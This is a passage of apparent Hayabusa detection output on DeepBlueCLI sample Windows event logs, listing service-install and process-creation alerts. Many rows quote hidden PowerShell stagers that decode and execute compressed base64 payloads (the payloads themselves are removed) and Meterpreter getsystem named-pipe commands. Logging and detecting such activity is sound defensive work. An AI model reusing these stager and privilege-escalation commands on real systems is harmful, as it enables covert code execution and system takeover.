IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''[base64 payload removed]''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''[base64 payload removed]''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('[base64 payload removed]
'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly 
Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''[base64 payload removed]''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | 
Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:00:33.473 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows 
defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:00:33.590 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: 
demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: 
xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
